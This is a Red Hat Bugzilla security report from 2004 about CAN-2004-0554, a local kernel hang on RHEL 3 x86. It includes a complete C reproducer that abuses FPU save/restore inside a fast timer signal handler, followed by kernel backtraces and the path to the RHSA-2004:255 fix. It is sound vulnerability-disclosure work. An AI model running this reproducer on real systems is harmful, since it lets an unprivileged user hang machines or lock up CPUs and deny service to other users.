Note: This bug is displayed in read-only format because the product is no longer active in Red Hat Bugzilla.

For bugs related to Red Hat Enterprise Linux 3 product line. The current stable release is 3.9. For Red Hat Enterprise Linux 6 and above, please visit Red Hat JIRA https://issues.redhat.com/secure/CreateIssue!default.jspa?pid=12332745 to report new issues.

Bug 125794

Summary:	CAN-2004-0554 local user can get the kernel to hang
Product:	Red Hat Enterprise Linux 3	Reporter:	Petter Reinholdtsen <pere>
Component:	kernel	Assignee:	Ernie Petrides <petrides>
Status:	CLOSED ERRATA	QA Contact:
Severity:	medium	Docs Contact:
Priority:	medium
Version:	3.0	CC:	bark, bnocera, greg, holger, jrfuller, k.georgiou, mjc, petrides, riel, shadow, tao, tburke, trondham, woodard
Target Milestone:	---	Keywords:	Security
Target Release:	---
Hardware:	i386
OS:	Linux
URL:	http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2
Whiteboard:
Fixed In Version:		Doc Type:	Bug Fix
Doc Text:		Story Points:	---
Clone Of:		Environment:
Last Closed:	2004-06-18 00:59:36 UTC	Type:	---
Regression:	---	Mount Type:	---
Documentation:	---	CRM:
Verified Versions:		Category:	---
oVirt Team:	---	RHEL 7.3 requirements from Atomic Host:
Cloudforms Team:	---	Target Upstream Version:
Embargoed:
Bug Depends On:
Bug Blocks:	116727

Description Petter Reinholdtsen 2004-06-11 14:44:16 UTC

Description of problem:

A message to linux-kernel two days ago describe the problem.
<URL: 
http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2 >.
I was unable to find such bug reported to the RedHat bugzilla, so
I report it here.

The problem is that code available from
<URL: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905 > get the
kernel to hang when executed as a normal user.  It has been
tried on several kernel versions, and seem to affect all of them.

Comment 1 Ernie Petrides 2004-06-11 22:19:54 UTC

Hello, Petter.  Could you please post a test case in this bugzilla
report (as well as any possible panic or oops output from the
console)?  As it stands, there's not enough information in this
report to debug a potential problem.

Thanks.  -ernie

Comment 2 Petter Reinholdtsen 2004-06-11 22:27:54 UTC

Sure.  Are you on a closed network or something?  The second
URL contain the source.  Here is it:

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
 char fpubuf[108];
 __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, Handler);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}

Comment 3 Rik van Riel 2004-06-12 02:51:34 UTC

OK, I reproduced the hang on my test system, got a backtrace too... ;)

Pid: 19752, comm:      kernel-hang-bz1
EIP: 0060:[<ffff345c>] CPU: 0
EIP is at 0xffff345c
 EFLAGS: 00000202    Not tainted  (2.6.5-1.332)
EAX: 00000001 EBX: 12005870 ECX: fef32ea8 EDX: 1958f000
ESI: 1958f000 EDI: fef32ea8 EBP: fef32e48 DS: 007b ES: 007b
CR0: 80050033 CR2: 00c4b720 CR3: 003ab000 CR4: 000006d0
Call Trace:
 [<0210dcda>] restore_i387_fxsave+0x18/0x60
 [<0210dd38>] restore_i387+0x16/0x65
 [<021059e5>] restore_sigcontext+0xf2/0x10c
 [<0215b737>] get_user_size+0x30/0x57
 [<02105c13>] sys_sigreturn+0x214/0x23a

Comment 4 Rik van Riel 2004-06-12 02:52:57 UTC

Hmmm, this backtrace is with a 2.6 kernel btw....

Tried it before rebooting my test box into a RHEL3 kernel ;))

Comment 5 Rik van Riel 2004-06-12 03:05:50 UTC

Here is the backtrace (alt-sysrq-p) for the very latest RHEL3 kernel.
 Definitely looks like 

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 7 Rik van Riel 2004-06-12 03:09:26 UTC

And a second alt-sysrq-p trace, of the same hang.  Guess it's looping
in the fpu restore and exception handling code somewhere?

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c01137b7>] CPU: 0
EIP is at save_init_fpu [kernel] 0x17 (2.4.21-15.5.ELsmp)
 ESP: 8000:c010cd47 EFLAGS: 00000206    Not tainted
EAX: bfebfbff EBX: d9818000 ECX: 00000068 EDX: d9818000
ESI: d9818000 EDI: c010ce50 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c010cd47>] math_error [kernel] 0x17 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e48)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e50)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e84)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 8 Rik van Riel 2004-06-12 03:11:07 UTC

... and a bunch more, in different functions ...

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1e4>] CPU: 0
EIP is at device_not_available [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)
                                                                     
          
SysRq : Show Regs
                                                                     
          
Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
 ESP: c20f:c0113d14 EFLAGS: 00000286    Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)
                                                                     
          
SysRq : Show Regs
                                                                     
          
Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
 ESP: c20f:c0113d14 EFLAGS: 00000286    Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)
                                                                     
          
SysRq : Show Regs
                                                                     
          
Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)
                                                                     
          
SysRq : Show Regs
                                                                     
          
Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1e6>] CPU: 0
EIP is at device_not_available [kernel] 0x2 (2.4.21-15.5.ELsmp)
 ESP: 3d14:ffffffff EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)
                                                                     
          
SysRq : Show Regs
                                                                     
          
Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c01355ab>] CPU: 0
EIP is at force_sig_info [kernel] 0x8b (2.4.21-15.5.ELsmp)
 ESP: 9e28:00000008 EFLAGS: 00000282    Not tainted
EAX: 00000000 EBX: d9818000 ECX: d992d380 EDX: d992d300
ESI: ffffffff EDI: 00000008 EBP: ffffffff DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c010ce50>] do_coprocessor_error [kernel] 0x0 (0xd9819e10)
[<c010cde8>] math_error [kernel] 0xb8 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c01343a2>] timer_bh [kernel] 0x62 (0xd9819e40)
[<c0133dcb>] update_process_times_statistical [kernel] 0x7b (0xd9819e48)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e54)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e5c)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e90)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 10 Rik van Riel 2004-06-12 16:30:24 UTC

OK, it looks like this bug is being tracked down on the linux-kernel
mailing list.  We'll make sure all the kernels shipped by Red Hat will
get the fix once we all agree on what the right fix is upstream.

This code is definitely too subtle for a "quick fix"... ;)

Comment 11 Johnray Fuller 2004-06-14 18:56:02 UTC

FYI, I got this from a customer:

"btw - we're noticing that it doesn't totally kill an SMP machine, but
rather throws one of the CPUs into a 100% system-time loop, with a
process that you can't kill

That tidbit might be of use to the kernel engineering guys"

Thanks,
J

Comment 12 Petter Reinholdtsen 2004-06-14 18:58:44 UTC

Do you have any estimate on when we can expect a new kernel
fixing this?  We need to schedule upgrade and reboot
of 850 redhat machines, and it would be nice if we could
start planning already.

Comment 13 Klaus Weidner 2004-06-14 19:21:51 UTC

FYI, this bug also affects x86_64 (Opteron) when running a 32bit
version of the exploit code. Native 64bit mode is not affected, but
the default kernel enables 32bit emulation mode.

32bit mode on ia64 (Itanium) may also be affected (untested).

Comment 14 Ernie Petrides 2004-06-14 22:54:22 UTC

A fix is in hand (posted in comment #5 of bug 125900).  Thanks
for the reproducer (in comment #2) and all the extra information.

I'll post more information when the fix is committed to RHEL3 U3
and also about what our plans our for issuing an RHSA erratum.

Comment 15 Ernie Petrides 2004-06-14 23:07:47 UTC

*** Bug 125968 has been marked as a duplicate of this bug. ***

Comment 16 Mark J. Cox 2004-06-15 07:29:33 UTC

Allocated CAN-2004-0554

Comment 17 Ernie Petrides 2004-06-15 10:11:41 UTC

A fix for this problem has just been committed to the RHEL3 U3
patch pool this evening (in kernel version 2.4.21-15.11.EL).

I will update this bug report again as soon as a (pre-U3)
security advisory is available.

Comment 18 Ernie Petrides 2004-06-17 11:13:13 UTC

Petter, in response to your comment #12, there is a Red Hat
Security Advisory in the works (RHSA-2004:255) for this bug
and two other problems.  Best case is that it will become
available late tonight (Thursday) on RHN, but it's more likely
to first be available tomorrow (Friday).  When the Errata is
pushed, this bug report will automatically be updated and closed.

Comment 19 Jay Turner 2004-06-18 00:59:36 UTC

An errata has been issued which should help the problem 
described in this bug report. This report is therefore being 
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, 
please follow the link below. You may reopen this bug report 
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2004-255.html